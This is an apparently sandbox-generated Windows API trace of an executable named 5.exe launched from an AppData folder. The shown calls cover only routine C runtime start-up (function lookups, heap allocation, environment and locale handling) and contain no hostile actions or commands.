"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 57 os_tid = 0xa24 [0045.621] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x198da190, dwHighDateTime=0x1d5956a)) [0045.621] GetCurrentThreadId () returned 0xa24 [0045.621] GetCurrentProcessId () returned 0xa20 [0045.621] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=16591939133) returned 1 [0045.756] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7714fd35, hStdError=0x771b7daf)) [0045.756] GetProcessHeap () returned 0x2a0000 [0045.757] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0045.757] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0045.757] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0045.757] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0045.757] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0045.757] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventExW") returned 0x76cb410b [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreExW") returned 0x76cb4195 [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadStackGuarantee") returned 0x76c3d31f [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolTimer") returned 0x76c4ee7e [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolTimer") returned 0x7717441c [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7719c50e [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolTimer") returned 0x7719c381 [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWait") returned 0x76c4f088 [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolWait") returned 0x771805d7 [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWait") returned 0x7719ca24 [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="FlushProcessWriteBuffers") returned 0x77150b8c [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7720fde8 [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessorNumber") returned 0x771a1e1d [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalProcessorInformation") returned 0x76cb4761 [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSymbolicLinkW") returned 0x76cacd11 [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0045.758] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesEx") returned 0x76cb424f [0045.759] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringEx") returned 0x76cb46b1 [0045.759] GetProcAddress (hModule=0x76c20000, lpProcName="GetDateFormatEx") returned 0x76cc6676 [0045.759] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoEx") returned 0x76cb4751 [0045.759] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeFormatEx") returned 0x76cc65f1 [0045.759] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLocaleName") returned 0x76cb47c1 [0045.759] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocaleName") returned 0x76cb47e1 [0045.759] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0045.759] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentPackageId") returned 0x0 [0045.759] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0 [0045.759] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0045.759] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0045.759] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3bc) returned 0x2b1e98 [0045.760] GetCurrentThreadId () returned 0xa24 [0045.760] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x18) returned 0x2b0930 [0045.760] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x800) returned 0x2b2260 [0045.760] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405695, hStdOutput=0xc4acd27c, hStdError=0x0)) [0045.760] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0045.760] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0045.760] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0045.760] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe\" " [0045.760] GetEnvironmentStringsW () returned 0x2b2a68* [0045.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0045.760] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x565) returned 0x2b3540 [0045.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2b3540, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0045.760] FreeEnvironmentStringsW (penv=0x2b2a68) returned 1 [0045.760] GetLastError () returned 0x7f [0045.760] SetLastError (dwErrCode=0x7f) [0045.760] GetLastError () returned 0x7f [0045.760] SetLastError (dwErrCode=0x7f) [0045.760] GetLastError () returned 0x7f [0045.761] SetLastError (dwErrCode=0x7f) [0045.761] GetACP () returned 0x4e4 [0045.761] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x220) returned 0x2b3ab0 [0045.761] GetLastError () returned 0x7f [0045.761] SetLastError (dwErrCode=0x7f) [0045.761] IsValidCodePage (CodePage=0x4e4) returned 1 [0045.761] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fedc | out: lpCPInfo=0x18fedc) returned 1 [0045.761] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9a4 | out: lpCPInfo=0x18f9a4) returned 1 [0045.761] GetLastError () returned 0x7f [0045.761] SetLastError (dwErrCode=0x7f) [0045.761] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.761] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f728, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.761] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9b8 | out: lpCharType=0x18f9b8) returned 1 [0045.761] GetLastError () returned 0x7f [0045.761] SetLastError (dwErrCode=0x7f) [0045.761] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.761] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.761] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0045.761] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0045.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fcb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿüÓ¬Äôþ\x18", lpUsedDefaultChar=0x0) returned 256 [0045.761] GetLastError () returned 0x7f [0045.761] SetLastError (dwErrCode=0x7f) [0045.761] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.761] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.761] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0045.761] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0045.762] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fbb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿüÓ¬Äôþ\x18", lpUsedDefaultChar=0x0) returned 256 [0045.762] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4732e0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe")) returned 0x56 [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.762] SetLastError (dwErrCode=0x0) [0045.762] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.763] SetLastError (dwErrCode=0x0) [0045.763] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) 